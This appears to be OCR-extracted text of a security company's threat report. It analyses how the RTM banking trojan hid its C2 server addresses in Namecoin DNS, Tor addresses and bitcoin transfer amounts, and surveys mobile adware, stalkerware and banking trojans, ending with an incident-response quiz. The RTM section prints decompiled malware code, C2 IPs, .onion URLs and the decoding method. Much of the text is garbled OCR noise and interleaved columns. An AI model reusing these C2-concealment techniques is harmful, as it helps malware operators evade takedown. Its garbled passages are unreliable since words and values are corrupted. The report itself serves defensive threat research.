get a C2 address using the Namecoin block eounk 2.3: 5 un 
explorer’s API. In that case, RTM used special Ecinter 2.60: eS 
DNS servers to receive an IP address that 2d 
corresponded to the domain name of the C2 5 7 
server. This was done by the ie 
functicial pr_index = GetValue_sub_40672C() % g . 

count ; > 

pr_index_1 = GetValue_sub_40672C( ) 7 
DnsQuery_A function In the malware’s % count ; 


core.dll ( pr_index_1 != pr_index ) 


dns_ip = *(&ip_dword + pr_ 
index) ; 


ip_addr = ip_address; 


figures 


ca. OMe |) (0) oe i am 0) ams ao (-> MEE Gn om 


ascil_cc_ptr = a1; ; 
dword + pr_index_1) ; 


Cybersecurity 


pr_index = @; 


( DnsQuery_A ) 


*(&ip_dword + pr_index_1) = 
dns_ip ; 


} 
ip_str = LStrToPChar(ascii->dns_ip_1) ; --counter ; 
// 188.165.200.156 


ip_dword = (*of_inet_addr)(ip_str) ; ( counter ); 
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count = 1; name_p = LStrToPChar(ascii_cc_ptr) ; 


( !DnsQuery_A(name_p, DNS_TYPE_A, 
1D) NES SHO1U] m3 0 A OLS) oi AO] oO) \| MO QE “ZOL010] ah Ome 
70) B) aks} .¢-1ex0) ae Bo) 


name_ptr = LStrToPChar(ascii_cc_ptr) ; 


( !DnsQuery_A(name_ptr, DNS_TYPE_A, 
1D) NES Sun O10] mt 0 A OL) oi AO] oO) \| Mn QE “Z0L010] ah Ome 
70) B) as} .¢-1e10) me Bo) 





&& pDnsRecord 
&& pDnsRecord && pDnsRecord->flag == 1 ) 
&& pDnsRecord->flag == 1 ) 


LOBYTE(pr_index) = 1; 


pr_index = GetIP_ 
sub_411DCC(&pDnsRecord->int@, ip_ 
addr, ip_addr, &savedregs) ; 





Attacks 
on organisations 


( pr_index ) The prototype of the DnsQuery_A 
function declared in the WInDNS.h 
( pDnsRecord && header file 


DnsRecordListFree ) 
NS) = a 
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DNS_STATUS 
WINAPI 


} 


ip_str_1 = LStrToPChar(ascii->dns_ 
ip_2) ; 


// 91.217.137.37 


DnsQuery_A( 
_In_ pszName, 
ip_dword = (*of_inet_addr) (ip_str_1) ; _In_ wlype, 


ip_str_2 = LStrToPChar(ascii->dns_ _In_ Options, 
ip_3) ; 


// 188.165.200.156 


_Inout_opt_ pExtra, 


_Outptr_result_maybenull_ 


ip_dword_1 = (*of_inet_addr) (ip_ * ppQueryResults, 


ze) 
Cc 
(40) 
Y 
Ww) 
=) 
‘e) 
Ss 
5 Cc 
r % (a0) 
str_2) ; S) 


on 
_ 
J) 
a 
O 
(40) 
Cc 
(4) 
ro) 
Ww) 
Cc 
(40) 
(@)) 
(40) 


_Outptr_opt_result_maybenull_ 
pReserved 


); 


ip_str_3 = LStrToPChar(ascii->dns_ 
ip_4) ; 


// 217.12.210.54 
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The fourth argument supplied to the 
function is the address of the 
structure on the stack. The 
structure contains an array of of special DNS 
servers IP addresses: 






_IP4_ARRAY structure on the stack 


-98000040 count 
-9000003C ip_dword 


-00000038 ip_dword_1 
-20000034 ip_dword_2 





If the DptelreyavaeAN function is executed 
successfully, the IP address of the C2 server 


can be obtained by reading the following value: 


pDnsRecord —> Data.A.IpAddress 


The decompiled code of one of the 
Samples shows that the special DNS server 


iT}3 Pa ele] BAZ bete). iS USed to resolve the 


C2 domain name. In case this fails, a list of 


three DNS servers is used: SARA RERYACY, 
188.165|.]200.1568217.12[.]210.54) 


2019: Tor 


On 15 February 2019, we discovered first RTM 
samples with a C2 server located in the Tor 
network (QRSaee FATT Meieiale)-<iiten ke peel ie 


oSanRolaymaatel-> anal elale) 





C2 server address In the Tor network 
among the decrypted strings. The data 
was obtained during the malware’s 
execution 


offset aHttp5aaw3unbkm ; 
“http ://S5aaw3unbkm5jqx7d.onion/index.php” 


offset aBotnetPrefix ; “botnet-prefix” 
offset aBotnetId ; “botnet-id” 


(o} i SX = 0 =| O10) O10) a] a[- Lon ol lol - 1 gol OM OL0) 0) 01 -1eu ie 
interval” 
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The section of the disassembled code 
where the C2 server URL is parsed 


KY.) eax, [ebp+lpUrlComponents |} 
push eax 


push ) 


-Y-) eax, [ebp+Url1] 


mov edx, ptr [ebp+pwszUr1] 


call WStrFromPWCharLen ; 
pwszUrl="http://w762icwux5m5p2mg.onion/ 
index.php” 

mov (-¥: > aa =) 0) oO a 

call WStrLen 
push eax ; dwUrlLength=@x27 
mov eax, ptr [ebp+pwszUr1] 


push eax ; pwszUrl="http:// 
w762icwuxd5md5p2mg .onion/index. php” 


mov eax, ds:WinHttpCrackUrl 
mov eax, [eax] 

call eax ; WinHttpCrackUrl 
mov (=) 0) Ga =T- D4 

test (=) 0) Ga =] 0.4 


r4 short loc_4@DF2C 


These samples were distributed until April 9, 
2019, after which RTM switched back to using 
the domain. 


Since 2019: bitcoin 


On 10 June 2019, we discovered an RTM 
sample that receives IP addresses of the C2 
servers from transactions to a specific wallet. 


As before, RTM generates two IP addresses. 
Each address is hidden in the number of 
bitcoins transferred during two consecutive 
transactions. 


In getting the IP addresses to the C2 servers, 
the malware sends a request to [skeqeksawad 


chain|.]so/api/v2/get_tx_received/ 
[EMK@. The response contains a set of 
transactions to the crypto wallet account: 
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“script_hex”: “@014b974@aeb6ef2al 
70aa512f01113dd77a32247196” 


“value”: “@.00003242” 


“status”: “success” 
“data” 
“network”: “BTC” 


“address”: “bclqh96q46mw72shp2j39uq3 
ZO@wh@gezguvk9qq5js” 


“confirmations” 


“time” 


” 


across industries 


“xs 


“txid”: “a7b26c289a3e27ef 5eafaa8b “txid”: “6c06482d309bbefa28cfb9a9 
VAstoW MA lole lon WAT Tetcle VAC ohm GLOW ASME Sc tol stor! 44bf975921cf7774d08371933769f3c8 
d900941f” 5a9681dc” 


Cybersecurity maturity 


“output_no” “output_no” 


ax You ah 0) Cmt-5)|| MP 4 OL 2-421-1-1 0] 01- Nm a- WAZ) axYou al 0) mt- 1) MPN I O° 20-1 -10 olny a- As) 
aa512f01113dd77a32247196" aa512f01113dd77a32247196" 


“script_hex”: “Q014b974@aeb6ef2al “script_hex”: “0014b974@aeb6ef2al 
70aa512F01113dd77a32247196" 70aa512F01113dd77a32247196" 


“value”: “@.00023643” “value”: “@.00023643” 
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“confirmations” “confirmations” 


“time” “time” 


a ti Ke MOEN ob IVA) 2 OKO [-Yol-1-7- WAstotele le heVa an i i> Gi Ke MUNIN Me Lolo h Monts] 010] 213040 lcley-4-loler-4 0M IVA 
81425f48ba9d7d89b2c03a5c67761d80 c122eb1b2ebf35c84b5e17f2591 f0684 
651f7424” 43bc1822” 
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“output_no” “output_no” 


ax You ah 0) mt- 5) | MDM 4 OL 2-420-(-1 0 0X-Sma- As) “script_asm”: “@ b974@aeb6ef2a17@ 
aa512f01113dd77a32247196" aa512f01113dd77a32247196" 


“script_hex”: “@014b974@aeb6ef2al “script_hex”: “@014b974@aeb6ef2al 
70aa512f01113dd77a32247196” 70aa512f01113dd77a32247196” 


“value”: “@.00014728” “value”: “@.00014728” 
“confirmations” “confirmations” 


“time” “time” 
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“txid”: “8f9ee9295a1c5792eac69FIO “txid”: “ccf403b8190a55676967100e 
13933d43dbb9c99d883713a1dd0f3073 b96694bae9a8e8ba852cbb1add4e8107 
f@6db5c1” 9cc993bc” 


“output_no” “output_no” 


“script_asm”: “@ b974@aeb6ef2a17@ “script_asm”: “@ b974@aeb6ef2a170@ 
aa512f01113dd77a32247196" aa512f01113dd77a32247196" 


“script_hex”: “@014b974@aeb6ef2al “script_hex”: “@014b974@aeb6ef2al 
70aa512f01113dd77a32247196" 70aa512f01113dd77a32247196" 


“value”: “@.00055637” mame © 00040030" 


“confirmations” “confirmations” 
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“time” “time” 


“txid”: “ddd0@9072a957c3e9e922Cc9Ic7 “txid”: “f93a4c95ed04e58eb32829ab 
Yo lone kobe WA er=1-VA0M Boley rexel etots{elolel-\er-) olen?) sKeloh mom hey scWA-toM BoM PAcker-)eler-/-mnole| ler mols) 
1a6e31fd” c46741cc” 
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“output_no” “output_no” 


“script_asm”: “@ b974@aeb6ef2a17@ ax You alo) mt-5)|| MDE 4 OL W2-420-(-1 0 0X-Sa- WAS) 
aa512f01113dd77a32247196" aa512f01113dd77a32247196" 
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“script_hex”: “@014b974@aeb6ef2al 
70aa512f01113dd77a32247196”" , 


meow © .00008483 "§ ) 


{ 


“confirmations”: 4/7/59, 


“time”: 1560187837 





We will look at how RTM extracts the C2 IP 
address from two transactions at the end 
(their BTC amounts are highlighted above). 


The code section showing the process 
of getting C2 IP addresses from a bitcoin 


iz2 


res, &savedregs) && FindValue_ 
sub_701714(&value_1, res, &savedregs) 


IntToString(value_1) ; 
v9 = SHR_8_sub_6F6464(value_1) ; 
IntToString(v9) ; 


IntToString(value_®@) ; 

v1@ = SHR_8_sub_6F6464(value_@) ; 
IntToString(v1@) ; 

v12 = v16; 

LStrCatN(v3, 7); 





transaction The (xaWatebfewmers function searches for 


fractional part of the transfer amount. The 


LStrClr(ip_addr) ; search starts from the buffer end. Each time 


LStrClr(v3) ; 
WStrCat3(&address, wide->api_v2_get_tx_ 


the function is called, data is processed 
Starting from the current index. In our case, 


received_BTC, bitcoin_wallet);// /api/ successive calls to the [iMaveMseeweers function 


v2/get_tx_received/BTC/<wallet> 


res = HttpRequest_sub_6FD7EC(wide- on. 
>chain_so, address, 0, 9, 443, 2, 96, 8, 
&DataStruct) != @;// chain.so 


will yield values 8483, 40030, 14728, and so 


( res ) Disassembled code for getting an IP 


address from the amount of transfers to 


res = Q; the crypto wallet 


LStrClr(ip_address) ; 
LStrClir(v3) ; 


LStrFromPCharLen(&ptrJsonData, 
DataPtr, DataStruct) ; 


Sysutils: :LowerCase(ptrJsonData, 
&ptrLcJsonData) ; 


LStrLAsg(&ptrJsonData, 
oho @ exe i-vo) a) Dy-har- Bs 


( FindValue_sub_701714(&value_®@, 
0, &savedregs) && FindValue_ 
sub_701714(&value_1, 8, &savedregs) ) 


af 
IntToString(value_1) ; 
octet = SHR_8_sub_6F6464(value_1) ; 
IntToString(octet) ; 
IntToString(value_®@) ; 
v8 = SHR_8_sub_6F6464(value_@) ; 
IntToString(v8) ; 
LStrCatN(ip_address, 7); 
LOBYTE(res) = 1; 


( FindValue_sub_701714(&value_®@, 





ptr [ebp+value_1] 
[ebp+ ] 
IntToString 
[ebp+ ] 
(o} SX ESI=1 8) , 
ax, ptr [ebp+value_1] 
SHR_8_sub_6F6464 
(=F: ) a a) a 
edx, [ebp+var_28] 
IntToString 
[ebpt+var_28] 
(o} 1-0 OE T=1 8) 


eax, eax 


ptr [ebp+value_@] 


[ebp+var_2C] 
i ahem Kobonen amare 
[ebpt+var_2C] 
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(o} S18 EST =1 9) 


has value_@ 
SHR_8_sub_6F6464 


var_30 


IntToString 


var_30 


LStrCatN 





The code above works as follows: 


ip_address = str(value_1 & Oxff) 


+ «.» + str(value_1 >> @x8) + «.» 


+ str(value_@ & Oxff) + «.» + 
str(value_@ >> @x8) 





This means that by transferring 0.00040030 
BTC and then 0.00008483 BITC, the attackers 
hid the IP address CYARRYA MRT) for the 


malware to find. 


Similarly, RTM obtains the second IP address 
of the C2 server from the two previous 
transactions. 


This mechanism is still used in the RTM 
samples distributed at the time of this writing. 
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When speaking about attacks on 
iINdividuals in the context of cybersecurity, 
AV. oms @ ATO S10 \Yn Al at=] mee) an] ©)celaalis\-1emaalele)i(= 
devices. More specifically, Android devices, 
which are the most common personal 
devices used to access the Internet. 
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Over the past 18 months, we have seen 
positive results of the mobile malware 
prevention efforts. Cases of money being 
ike) (=1amicelaamvs(erl aalsmaalcelelelamaar-lileelel- 
apps have decreased. 
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developers who make money off adware or 3 0 
tracking the digital behaviour of users. Their a 2, 
monetisation models are part of a legal sector Q* 
of economy; still, this does not make their apps - 
less dangerous. 
Nevertheless, it is much too early to speak 
about a complete defeat over conventional 
cybercrime. A year ago, we noted some new ay 
techniques used by a number of banking fs c 
malware families. Today, it seems this may Bc 
1e) 


spark a large-scale evolution of malware which 
will either lead to new cyber epidemics or to 

increased destructive effects of each individual 
attack. 
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2. Operating system market share worldwide // 


Statcounter Global Stats. 
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At the end of 2019, the overall activity of mobile 
malware reduced considerably. 
> 
-Neorore)ce||alemtene)al-mocil|aalciccrmialcnale|aalel-1me)i An application package is f= a 
aarele)itou aarsliivz=lcewe] ©) ©)| (ersli(elam oy-\e1,<-1e [tome |ne) 0) a(a18) i Se eee ee ie 5 5 
W) 

. n 2 
ARtllse (34%) olan] <Item o/aeltomelelele]iale needs to perform its functions. ge 
1KOlAAMUAISMSIECIEISIELOCSNO) AEs AINNISUISRSO) ANY oIoMU AIS Nacctal ee larealialeRselelahelanelceali Zc} o 
number of targeted attacks against users also the operating system installs and 
d d by 31% 2 (ofo) ah ite [el a=ssmtalou-]0)0)|(er-1e(e)amelamialc 

ECTeased DY ol”. device by itself. 
One of the causes of this decline is the end Android uses the APK 
of the Asacub family outbreak. Asacub was a ee eer Le au 
; ; ; application packages. 
oxo) aNycialele)ate]mer-1al.<jalemece)- lan eleysi ale m- Mia) icr-1mce y x 
the banking sphere as far back as 2018 (more a 8 
: . 3 r : : Y 
details below, in the section ‘Banking trojans: <5 
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app activity and mobile ransomware incidence 
is at least in part responsible for the overall dip 
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vulnerabilities that often tend to be exploited 

by hackers. For instance, Android 10, released 
Tamex=10)(<100]01-1ay40N bommerclaai-mi\7ivanclame)elerciic 
idarclanliaaliesws)e)e\smice)aamaelalalialeme)celercsisoowe) ale 
accessing location in the background.* Android 
11, which is yet to be realeased as of writing this 
report, is expected to have changes regarding 
permissions. Specifically, users will have the 
(o)0) ie)ae)ine|g-lalujareslam-]0)e)|(er-1tle)ane)aloulllaals 
access to their data.° 
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3. Mobile malware evolution 2019 // Securelist. \ 
4. Privacy changes in Android 10 // Android Developers. 
5. Permissions updates in Android 11 // Android Developers. 
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Secondly, Google keeps toughening its control 
over applications in the Google Play store. For 
example, the company has included outside 
partners in the moderation of software 
Submitted to the store. Last November, Google 
announced partnership with antivirus software 
developer ESET, as well as with Lookout and 
yA\an\eX=1glb leave eveliamere)an|ey-lalissses)e\-ceiel Salen ia 
mobile security. Under the framework of the 
newly-formed App Defense Alliance, Google's 
own Play Protect works alongside external 
malware detection systems.° 
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Despite the recent progress in mobile malware protection, 
it is still too early to disregard these threats completely. 
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In the previous chapter (‘Attacks on 
organisations’) we discussed how adware 
spilled into corporate networks on mass after 
which it was no longer regarded as a threat 
exclusive to individuals. 
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Yet, this does not mean that adware developers 

have forgotten about their former market. In 

2019, there was a relative surge in this type of ‘ 
mobile malware, which is known to primarily 

affect individual users. 


The number of adware application packages 
has almost doubled over the last year: 
according to one estimate, their number 
increased by 74% in 2019, compared to 2018. 
Recent observations reveal that 4 out of 10 
families of malware which are most frequently 
used to attack mobile devices were found to be 
ele Niel home 
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attention than it deserves due to its seemingly 
harmless nature. But, in actual fact, this 
software has all the technical capabilities to 
Start standard malware attacks. 
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Adware’s main objective is merely force-feeding 
idalclaaiee\eloucl ale mialelsmel allele me] omsalcmalelanleloime)i 

ad views which, in turn, brings in more money 
from advertisers. However, this is implemented 
oN mlarsitcliiialem=leleldelars|manteyele) (somal (eanerla 
potentially perform any other actions without a 
users knowledge, like stealing their data. 


Adware can also pass the sniff test of app store 
moderators simply because the line between 
Uleram aalel\iviclxomel elem (=e ]ldlaatcltcae]e)e)|[erclele)arsy 
which use advertising in their business model, 
SaVciavalaliar 
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text recognition app, is a good example. For 
some period, it was monetised only by means 
of ads and premium subscriptions. However, 

in Summer 2019, cybersecurity specialists 
discovered a malicious component in the apps 
file which downloaded additional modules 
without the knowledge of users. In this 
particular case, the additional modules had 
adware functions. As a result, Google deleted 
the app from its official store.'°" 


9. Mobile malware evolution 2019 // Securelist. 
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Soon after this incident was made public, 
o[=\=l (0) 01s16om@) i Or-laalsier-lalal-lmeltclianicemuarcimtal 
malicious code had been part of the advertising 
SDK which they successfully removed. 
Following this, the application returned to 
Google Play Store.'* 


The reason adware requires special attention, 
as mentioned earlier, is because of the tricks 
used by its developers to ensure functioning. 
This can be showcased by the example of 
adware symbolically dubbed by researchers 
as ‘Agent Smith’. With the help of a legitimate 
app, Agent Smith infiltrates a device, but it 
olorcromalelmsi(e) Mt al=1i-mm lism aale||(elel0lsmere) an] eye)at-vall 
modifies other applications in the system to 
display advertising. By the time cybersecurity 
specialists discovered Agent Smith, it had 
already infected 25 million devices.'° 









12. Detail // CamScanner. 
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SDK (Software Development Kit) 
is a set of different tools which 
helps developers to integrate 
third-party features. 


Usually such features are related 
iontal-mel(-1acelsaamie)myialeamiarcea|0)®) 
is being developed, such as an 
operating system, social network, 
a game console, etc. In these 
cases, SDK is developed by the 
owner of the platform. 


Such a platform may also 

be an advertising network, 
idatcmanlielel(<ipar-lamexcianiici-lameals 
advertiser and the app owner 
providing banner or video slots. 

If an advertising network has its 
own SDK, applications developers 
are confined to using it if they 
want to serve ads and make profit. 


SDK is integrated into software, 
making the software execute 
third-party code. Therefore, 
security of end users depends not 
only on the app developer, but also 
on the SDK owner. 
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Stalkerware: a bug 
TaMay.ele lam elerer core 


2019 also saw the surge of stalkerware. That 
year the number of its victims grew by 67%, 
compared to 2018. 


Stalkerware is essentially spyware, but it only 


eliacclecwlamtalsesere)e\- Rel iUlareiico)ar-llinvaclalemtar= Unlike regu rele J OAc = 
aatciagveleme)maale)alcitisrciu(e)ay : 
stalkerware Is openly 


When criminals use conventional spyware, they 


rarely concern themselves with the victim’s data, Yo) (oe ia lowe me kele) mie) s SpyI aye 
but rather look for ways to access their finances, | 
OYeMimealcolllelaRs)\V\suovelalaiaeMmyNi-10N er-la) <lnle olamre aalihys aal=anle\=)6- 


credentials or other personal data useful for 
social engineering. 
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Stalkerware, on the other hand, is developed 
with the express purpose of gathering the 
victim's sensitive data and passing it on to a 
third party. With this class of malware, the third 
party is often not some anonymous darknet 
customer who likes to collect large datasets, 

but a person who personally knows the victim. 
Stalkerware developers sell it as a tool for spying 
On spouses, partners or children.'*: '° 


14. Mobile malware evolution 2019 // Securelist. 


i Roveuel Mal=el-lale(—1asme)i Vo )aliKe)a \V/ilalelm@citell <olmW feline de ‘ 
Kaspersky Daily. 





Executive 
1olaaleat-l av 


Cybersecurity Cybersecurity maturity 
figures across industries 


Attacks 
ola of-1al-45) 


Attacks 
ola me) cel-lali-t-lalelar-) 


a 
O 
WwW 2 
xD 
£5 
qc 
Cc 
Oo 





(Or Tamyolem-it-Tale 
Ye F-}ia}=jar- im at-Lel.<-1 ara 


yN eyelets 
BI.ZONE 


a 
ey 
22 
Ou 
no 
Stalker applications can be divided into two rt © 
types. O 
The first type includes trackers with relatively 
i]an]8)[omielareis(e)arcl/INVav\valleame)al\mexe)|(<xe1mr-]ale x 
transfers victim's coordinates and SMS chats. r: A 
Such applications used to be widely available o = 
in Google Play Store until February 2018 g = 
when Google banned tracking software on its O 
platform. Since then, the number of trackers in 
Google's official store has reduced considerably, 
and their developers have stopped supporting 
such applications. 
Ai atcusx-rere) ale ay, e\omlalei|ble(<1omanle)tom-leh\clalercre vy x 
apps. These can collect almost all data on the a 8 
device: photos, calls, messages, location data, <5 


etc. Such software is being actively developed 
to this day and often distributed directly via the 
developers’ websites. 


Stalkerware of the second type exploits 
vulnerabilities related to device administrator 
privileges and accessibility service. This 
allows for messages with default protection 
to be captured from social media and mobile 
messengers. When impossible, they simply 
take screenshots, record keystrokes or copy is 


texts from input fields.’ 
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stalkerware victims'® 
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compared to the year before that, while the 
eale)aliai\malelanle\-1me)mclarcle.. cour -ile] aa(-rem(Onltceelelalc 
2018 levels. @) 
This result can largely be attributed to the @) ¥ x 
reduction of Asacub activity, the malware ® o 
responsible for 44% of all attacks using such L5 


trojans. Between March and April 2019, the decrease of fraudulent 
number of victims of Asacub decreased by transactions through SMS 
almost 2.5 times; and between April and May ofo)aalaat-lalelsmiaee)cel-re 

2019, this number fell a further factor of three. in Russia since last year 
ON1h talcum aly am aale)aiialswmlalcue\icleleomalelan)e\-1me)i 

attacked users amounted to 23.6 thousand, 

which is just a quarter of the peak seen in 

March 2019."” 
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Another reason for the last year’s reduction 
of the banking trojans’ activity could be their 
general obsolescence. 
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Malware of this class usually attacks either by 2s 
P , = = 
capturing commands used by SMS banking 3 
: F J : - ow 
or by exposing the victim to phishing windows nm 
he wo Y 
which pretend to be legitimate payment forms. Qe 
UO 
Error lngeiray lake 
Faiedl ta cerrriiie your locatien y-Nak=).<<]an|el(-me)mtale 
emerticee second method is > 
checking demonstrated by the = a 
Faketoken family, which z @ 
was used in a large-scale a = 
attack this February."® ge 
> 
Attention WVdatclaneu(crelidiaataltcealele UV 
Dear user, due to increasing frauds and . opened (€.g. 2 ian! 
malusage of internal functions of the VISA service as shown in the 
application, we are forced to introduce screenshot) the malware 
anew requirement for all our users. ; ae ; 
Please enter the details of your debit/ : displays a notification 
credit card for one-time verification , that urges the user to 
of your identity. Within 24 hours, 
an amount equal to 1 RUB will be enter payment details T) iV 
withdrawn from your card and then under a contrived pretext i. Cc 
returned. elalemtarsanelisvelte\cwe) © 5 
olalisialiaremialeleimielenay x . 


Nal talismersIs\orm alc [e1,<cl as 
expect the distracted 
UISolgsmCOMAAIISIEcLComlals 
ialolaiirerclerelamaiarele\iswelale) 
datum [alelelmie)eaam(e)mcleitel-| 
components of the taxi 
Where are you goang? -1aviers¥-lole)l(er-lt(elaF 
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SMS banking with banks urging clients to 

use applications even for simple transaction 
notifications. As a result, over the previous 
year, in Russia, the number of fraudulent 
iteclatsreleis(e)alomaar-le(omealcelele]ame)\iteuey-]al.<ialem acts 
reduced by 62%, compared to 2018. Hence 
incidents involving money theft using SMS 
commands fell to 12%. 
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i alcusscreco)alemaal=lalelemiswalenelg-lel6l-l| hale siale 
traction. It requires attackers to use their own 
devices to access a victim's bank account 
elalemieelalsiicimtal-manle)al-\ael01 me) miemOlalll <omtals 
transfers using smartphones, such operations 
raise enough suspicion to be detected 

and blocked by fraud prevention systems. 
Therefore, phishing forms have been gradually 
losing their attractiveness. 


WV e\~icelglaaliarclismexe)aluialeromtenel-\Vi\cmalca ware] ale 
more destructive techniques. 


In Threat Zone 2019, we discussed how some 
oye Tal .<lale Mace) (-larsmere)alce)mlalicveltcve mela (erors 
through the Android accessibility service. 
This service allows malware to fill out forms 
and press buttons in other apps without 

the knowledge of the user. In these cases, 
money is stolen using SMS banking or, in 
some extreme cases, via the user's personal 
application account. Recently, this activity has 
been on the rise. 
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In spring 2019, cybersecurity specialists spoke 
about a banking trojan called Gustuff. Gustuff is 
targeted on 132 different financial apps, 100 of 
idalclaamel=i/alepc]e)e\sme)imeliaicic-ialm ey-lal. oma malic 
countries and 32 of them being cryptocurrency 
wallets. 


The way this malware works is similar to that of 
PC banking trojans, such as Buhtrap and RTM 
idarclamaateiallelelicicom=(eree)0] aldlalemsVe)AaV\7-1t-mCons/elele)i 
payment orders. Using the accessibility service, 
Gustuff presses buttons and fills out financial 
forms so that the money is transferred to the 
hackers accounts.” 7° 


If hackers need authentication data, Gustuft 
displays a fake notification urging the user to 
Ujoler=iccmualom er-\Zeal-ialmel=ircllism(ialel(erclaiaremearcit 
Google Play requires it) and then waits for the 
user to enter the data to be captured.?' 


Despite its impressive functionality, Gustuft 
has not yet reached even the top ten of the 
most frequently encountered banking trojans.” 
However, this malware can be considered a 
powerful one, just as the rest of the subgroup 
(0) nato)e)|(=mey- 1a] <ialeMaarclAWiclkomuzelleamelsiomtalc 
accessibility service. It is not unlikely that they 
will prompt a new avalanche of banking trojan 
activity this year or later on. 


19. Mobile malware evolution 2019 // Securelist. 
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A single mistake in cyber threat response 
could outweigh any advantage you 

had over the attackers. This may cause 
das) Oy=] a=] ©)(-mer-)aar-\erom- | arom aat-l.<omaelanalcie 
investigation impossible. The matter 

SMU) ae l>lalem-| elem Aal-mel-rell>)(0) a\smnem elm aal-[e(> 
are not always Obvious. 


We have compiled a small quiz based on 
IRV, ©) (er=] BS) [A OT- 1010) aicm- Oils Om aal-\\a-laeolelaltsis 


What would you do in these situations? 
Answer these 9 questions to check your 
knowledge and incident response skills. 
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Malware has been detected on several computers Ea 
IN your organisation. Analysis shows that the =e 
e WY 
malware is used by a group that encrypts data and : 3 
Wal—lame(—leat-]aleims-] alse) gamelmel-relay, ealelar as 
UO 
a 2 
What do you do first? a 
De 
ve 
S 
same D)[soro)alal=colmntal-mere)anlerclaNy acm ali tc lsitae (eile | comice)aamialcmlaltcigarcil 7 
2. Launch a company-wide antivirus scan 
3. Isolate the domain controller(s) from the corporate network 
4. Physically turn off users’ computers re 
x 
< § 
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Malware has been detected on several computers 
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malware Is used by a group that encrypts data 
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What do you do first? 


3. Isolate the domain controller(s) from the corporate network 


PAN @ISWVAVoN 6 


If the attacker gains the possibility of encrypting data in all systems of your 
network, the most efficient solution is to isolate or turn off the domain 
ore)aline)iisie 


Attackers often use group policies and tools like PS Exec and WMI to 
spread their ransomware within the network and launch it automatically. 
il atcxs\om cole] \SmUli0l-]|\Va acre] 0] como maelalalialemele)aar-liamere/alice)i(-imcy|alecu las 
responsible for authentication in other systems, which the attackers need 
to launch the malware. If you turn off the domain controller, hackers will 
not be able to execute commands on remote computers as easily. 


O}aler-mZolUmal=\\iom'.0)0] mele)nar-llamere)alige)i(-1mlelga(-1eme)AmmY 010 mer-|amc\~r- lela m(e)mlal= 
malware and delete it, find compromised accounts, etc. 


Disconnecting the entire infrastructure from the Internet may not be as 
efficient at this stage since it is unknown yet whether the encryption has 
begun or not. Isolation may be the next step of the response process. 
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An unknown person contacted you and reported 

a critical vulnerability in your infrastructure/services 
which anyone can exploit to access clients’ data. 

al alsw-larela\zaalelersm el-16-1eamiSmyiVdlllale mEOke (= \-\e1gl elon aal= 
vulnerability for a small consideration and shows some 
real users’ logins and passwords as a proof. 


WAVE a Yo KO [OMV.010 me ors 


1. | will pay for the information about the vulnerability = “= = 


2. | will ask acompany that provides penetration testing services to eolniicat 
the vulnerability | 


3. | will report the incident to law enforcement authorities 


4. | will try to find out if there is another way to obtain the data 
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An unknown person contacted you and reported 

a critical vulnerability in your infrastructure/services 
which anyone can exploit to access clients’ data. 

al alsw-larela\zaalelersm el-16-1eamiSmyiVdlllale mEOke (= \-\e1gl elon aal= 
vulnerability for a small consideration and shows some 
real users’ logins and passwords as a proof. 
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4. | will try to find out if there is another way to obtain the data 
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Attackers often use information obtained as a result of leaks from one site 

or service (login and password databases) to extort money from the owners 

of another. They do it by checking if the leaked data was used in other services 
and then contact the owners of these services about a purportedly discovered 
vulnerability. In fact, there is no vulnerability, other than the possibility to quickly 
guess legitimate user credentials with brute force methods (this is called user 
cralelaat=ieciecela) 


Approaching a company that provides penetration test services Is a good idea 
but should be done at a later stage when you know what kind of vulnerability 
to look for. It is too early to contact law enforcement authorities at this stage 
as well. 


In our practice, we have often encountered cases when companies paid 

for the information about vulnerabilities without having properly investigated 
all circumstances. Once the money was paid, the mysterious friend just 
disappeared. 
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You suspect that one of your employees Is stealing 
lalsirelsyaulaiie)aaat-1ale)am-lalemel-\elle(-mnomel-lual-)a-\/4[e(-1a(e> 
from their work PC for potential investigation. 





What do you do first? 


1. Isolate the PC from the company’s network 


2. Seal off the computer case and put it into a safe until all circumstances 
have been cleared up 


3. Image the system's RAM 
4. Image the HDD 
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First of all, you need to get an image of the system's RAM. This will 

back you up if the attackers use encryption tools like crypto containers 
(VeraCrypt, etc.) to hide the stolen information. Encryption keys are stored 
in RAM; in case the computer is turned off, they will be irretrievably lost 
together with access to data. 


When the RAM image is ready, you can proceed to making a forensic 
Taate\e(ome)mta\omalcicemelah\uce 
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You come across a critical vulnerability in the 
lalice}sieau (e1d6 lao =>.40)(e)d | arom ualicmv.0llal=le-1e)/ IAAI INAS 
attackers full access to all systems of the company. 
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1. Change all passwords to all accounts in the domain as soon as possible 


2. Thoroughly investigate the vulnerable systems since attackers may have 
already exploited the vulnerability 


3. Patch the vulnerability without informing anyone 


4. Install a backdoor on the company’s domain controller in case the 
employees dont cooperate during response 
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In this case, you need first to conduct a detailed analysis of the vulnerable 
systems. This will allow you to find out if there are any signs of somebody 
exploiting the discovered vulnerability. Based on the results of the analysis, 
you can proceed to further steps, e.g. configuring the process of monitoring 
daloulalitclsitau [eile] eome)melar-lale]|a\em er-IsS\ We) 00 1se 
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An employee of the company receives an email with 
suspicious attachment and forwards It to a member 
of cybersecurity team, just to be safe. 





What should the member 
do with the email? 


1. Open the attachment to make sure it is malicious 


2. Analyze the email using dynamic analysis tools or services of another 
oro)anley-la)\, 


3. Scan the attachment with antivirus software and send the results to the 
employee who had received the email 


4. Discipline the employee for sending emails with malicious attachments 
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An employee of the company receives an email with 
suspicious attachment and forwards It to a member 
of cybersecurity team, just to be safe. 
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do with the email? 


2. Analyze the email using dynamic analysis tools or services of another 
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The correct option Is to analyse the letter. This is the only way to confirm 
whether the attachment is malicious or not. If the company has its own 
experts in malware analysis, great. If you do not have such specialists, you can 
use an automated Sandbox service, a Threat Intelligence Platform or services 
of a third-party company. 


A mere antivirus scan will not be enough. Before starting a phishing campaign, 
oN 0\—1ce1glanliarelicmaalel.comsie] comealsl@antcli(e(0l0lou-laarel|mclarclealaalcialecme(omalelme|cit 
detected by any antivirus. Dynamic analysis tools, alongside with information 
from Threat Intelligence, can detect such threats much more effectively. 


We have seen numerous cases where malicious attachments were opened 
by employees responsible for cybersecurity. There were even cases of a CISO 
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A few month ago, there was a serious incident in your 
company: the adversary had full access to the entire 
infrastructure for two weeks. The incident was 
contained and eradicated. Now, antivirus software 
detects suspicious executable files used by the same 
cybercriminal group on servers in the internal network. 


WAV aYo lms) aTelUILOmVelU melon lamaalls 
case? 
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2. Check these systems with another antivirus to exclude a false positive 


3. Check all systems for the indicators of compromise discovered during 
idaloucoreccialmlarele(sall 


4. Clear antivirus logs: these must be the files that have remained in the 
systems since the previous incident 
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A few month ago, there was a serious incident in 

